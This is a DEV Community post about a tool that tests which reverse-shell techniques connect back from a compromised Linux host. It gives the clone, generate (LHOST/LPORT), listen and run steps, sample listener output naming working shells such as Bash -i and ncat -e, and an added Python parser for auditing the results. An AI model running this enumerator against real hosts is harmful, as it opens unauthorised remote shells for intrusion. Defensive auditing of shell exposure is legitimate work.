DEV Community

fx2301

Reverse Shell Enumeration

Why?

You're a defender wanting to audit which reverse shells work out of the box on a particular host. Or, you're a lazy attacker wanting to quickly determine which reverse shells will work.

When?

You have remote code execution on a Linux host, and the noise this enumeration generates is not an operational concern.

How?

  1. Clone the repo:

    git clone https://github.com/fx2301/reverseshellenum.git
    cd reverseshellenum

  2. Generate yourself a fresh script:

    LHOST="10.10.0.123" LPORT=31373 python3 generate.py

  3. Run the listener:

    ./listen.sh

  4. Run the reverse shell enumerator on the target host:

    ./reverseshellenum.sh

  5. Observe which shells work (refer to shells.json):

    $ ./listen.sh
    [i] Starting Reverse Shell Audit
      [+] Success: Bash -i
      [+] Success: Bash 196
      [+] Success: Bash read line
      [+] Success: Bash 5
      [+] Success: ncat -e
      [+] Success: Perl
      [+] Success: Perl no sh
      [+] Success: PHP Emoji
    [i] Ending Reverse Shell Audit
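
As an added example (not part of the original post or the reverseshellenum tool), here is a Python parser for the listen.sh audit output shown above, plus a helper that diffs one run against a baseline from a previous audit of the same host so a defender can see which shell techniques newly work or no longer work. The sample output and the baseline list are constructed for this example.

```python
from __future__ import annotations
import re
from dataclasses import dataclass, field

# Markers and line format as printed by listen.sh in the post's example output.
START_MARKER = "[i] Starting Reverse Shell Audit"
END_MARKER = "[i] Ending Reverse Shell Audit"
SUCCESS_RE = re.compile(r"^\s*\[\+\] Success: (.+?)\s*$")


@dataclass
class AuditResult:
    succeeded: list[str] = field(default_factory=list)  # shell names, in order seen
    complete: bool = False  # True only if the end marker followed the start marker


def parse_audit(output: str) -> AuditResult:
    """Extract the reverse-shell techniques that connected back during one audit run."""
    result = AuditResult()
    in_audit = False
    for raw in output.splitlines():
        line = raw.strip()
        if line == START_MARKER:
            in_audit = True
            continue
        if line == END_MARKER:
            result.complete = in_audit  # an end without a start is not a complete run
            in_audit = False
            continue
        m = SUCCESS_RE.match(raw)
        if in_audit and m and m.group(1) not in result.succeeded:
            result.succeeded.append(m.group(1))  # ignore prompt echoes and other noise
    return result


def compare_to_baseline(result: AuditResult, baseline: list[str]) -> tuple[list[str], list[str]]:
    """Return (newly working, no longer working) relative to a previous audit's success list."""
    current, previous = set(result.succeeded), set(baseline)
    return sorted(current - previous), sorted(previous - current)


# Constructed sample: the listener output from the post, as captured from a terminal.
SAMPLE_OUTPUT = """$ ./listen.sh
[i] Starting Reverse Shell Audit
  [+] Success: Bash -i
  [+] Success: Bash 196
  [+] Success: Bash read line
  [+] Success: Bash 5
  [+] Success: ncat -e
  [+] Success: Perl
  [+] Success: Perl no sh
  [+] Success: PHP Emoji
[i] Ending Reverse Shell Audit
"""
```

An audit whose end marker is missing (the enumerator was killed, or the listener was stopped early) is reported with complete=False so it is not mistaken for a clean negative result.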

PRs welcome! Kudos to revshells.com for the raw material.
